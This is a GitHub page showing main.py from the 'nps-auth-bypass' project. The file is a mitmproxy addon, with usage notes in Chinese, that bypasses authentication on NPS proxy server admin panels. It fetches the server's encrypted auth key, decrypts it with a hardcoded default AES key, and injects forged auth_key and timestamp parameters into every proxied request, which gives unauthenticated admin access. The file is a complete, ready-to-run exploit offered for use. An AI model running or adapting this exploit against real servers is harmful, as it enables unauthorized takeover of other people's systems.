-
Notifications
You must be signed in to change notification settings - Fork 39
/
main.py
63 lines (54 loc) · 2.2 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- encoding:utf-8 -*-
"""
@使用方法:
mitmdump -s main.py -p 8000 --mode reverse:http://x.x.x.x:x/
浏览器访问 http://127.0.0.1:8000/
@项目地址:
https://github.com/carr0t2/nps-auth-bypass
"""
import time
import hashlib
import mitmproxy.http
import mitmproxy.addonmanager
import requests
from Crypto.Cipher import AES
class NpsHack:
def __init__(self):
self.config_auth_key = '' # 默认配置为空 假如某个不为空可以自己添加
@staticmethod
def md5(s: str) -> str:
m = hashlib.md5()
m.update(s.encode())
return m.hexdigest()
def load(self, loader: mitmproxy.addonmanager.Loader):
try:
# 对应只修改了配置中auth_key 未修改auth_crypt_key的情况
# 具体api内容见官方文档
# https://github.com/ehang-io/nps/blob/c9a4d8285b30c3c140782fc660bfc3d6961262ed/docs/api.md#%E8%8E%B7%E5%8F%96%E6%9C%8D%E5%8A%A1%E7%AB%AFauthkey
url = loader.master.options.mode[8:].rstrip('/')
burp0_url = url + '/auth/getauthkey'
r = requests.get(burp0_url, timeout=2)
crypt_auth_key = r.json()['crypt_auth_key']
defaul_aes_key = b'1234567812345678'
b_key = bytes.fromhex(crypt_auth_key)
enc = AES.new(key=defaul_aes_key, mode=AES.MODE_CBC, iv=defaul_aes_key)
config_auth_key = enc.decrypt(b_key).decode()
config_auth_key = config_auth_key[0:-ord(config_auth_key[-1])] # 去填充
self.config_auth_key = config_auth_key
print('成功获取config_auth_key', config_auth_key.encode())
except Exception as e:
# print(e)
pass
def request(self, flow: mitmproxy.http.HTTPFlow):
r = flow.request
now_timestamp = str(int(time.time()))
auth_key = self.md5(self.config_auth_key + now_timestamp)
r.query.set_all('auth_key', [auth_key])
r.query.set_all('timestamp', [now_timestamp])
flow.request = flow.request.make(
method=r.method,
url=r.url,
content=r.raw_content,
headers=r.headers
)
addons = [NpsHack()]